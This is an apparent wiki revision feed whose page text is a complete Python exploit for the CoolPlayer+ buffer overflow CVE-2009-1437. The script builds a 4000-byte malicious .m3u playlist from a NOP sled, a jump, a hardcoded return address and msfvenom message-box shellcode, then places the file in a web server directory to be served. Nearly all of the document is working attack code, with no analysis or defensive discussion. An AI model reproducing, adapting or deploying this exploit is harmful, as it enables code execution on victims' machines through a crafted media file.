https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2009-1437_PortableApps_CoolPlayer_Portable%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
CVE-2009-1437 PortableApps CoolPlayer Portable緩衝區溢出漏洞 - Revision history
2026-04-16T16:48:08Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2009-1437_PortableApps_CoolPlayer_Portable%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=895&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> #!/usr/bin/python """ Content: Exploit coolplayer+ <= 2.19.6 Author: Florian Hansemann | @HanseSecure | https://hansesecure.de Date: 02/2018 Related Vulner..."
2021-04-02T03:59:19Z
<p>Created page with "==EXP== <pre> #!/usr/bin/python """ Content: Exploit coolplayer+ <= 2.19.6 Author: Florian Hansemann | @HanseSecure | https://hansesecure.de Date: 02/2018 Related Vulner..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
#!/usr/bin/python<br />
""" <br />
Content: Exploit coolplayer+ <= 2.19.6<br />
Author: Florian Hansemann | @HanseSecure | https://hansesecure.de<br />
Date: 02/2018<br />
<br />
Related Vulnerability: CVE-2009-1437 && Exploit https://www.exploit-db.com/exploits/8519/<br />
"""<br />
<br />
import sys<br />
from subprocess import call<br />
<br />
<br />
"""<br />
RET address:<br />
00402C77<br />
Converted reverseHex value:<br />
\x77\x2C\x40\x00<br />
<br />
"""<br />
<br />
#msfvenom -p windows/messagebox TEXT="Owned by @HanseSecure" -f python<br />
<br />
buf = ""<br />
buf += "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9"<br />
buf += "\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08"<br />
buf += "\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1"<br />
buf += "\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28"<br />
buf += "\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34"<br />
buf += "\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84"<br />
buf += "\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24"<br />
buf += "\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"<br />
buf += "\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c"<br />
buf += "\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"<br />
buf += "\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\x7e"<br />
buf += "\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89"<br />
buf += "\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68"<br />
buf += "\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56"<br />
buf += "\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"<br />
buf += "\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68"<br />
buf += "\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c"<br />
buf += "\x24\x0a\x89\xe3\x68\x65\x58\x20\x20\x68\x65\x63\x75"<br />
buf += "\x72\x68\x6e\x73\x65\x53\x68\x20\x40\x48\x61\x68\x64"<br />
buf += "\x20\x62\x79\x68\x4f\x77\x6e\x65\x31\xc9\x88\x4c\x24"<br />
buf += "\x15\x89\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0"<br />
buf += "\x50\xff\x55\x08"<br />
<br />
<br />
ret = "\x77\x2C\x40\x00"<br />
jmp = "\xeb\x1e"<br />
<br />
buffer = "\x90"*230 + jmp + "\x90"*2 + ret + "\x90"*50 + buf + "A"*(4000-234-4-50-len(buf))<br />
<br />
<br />
print "[+] Creating malicious file"<br />
file = open("test","w")<br />
file.write(buffer)<br />
file.close()<br />
call(['mv test /var/www/html/test.m3u'], shell=True)<br />
print "[+] File created and moved to webspace successfully"<br />
<br />
</pre></div>
Pwnwiki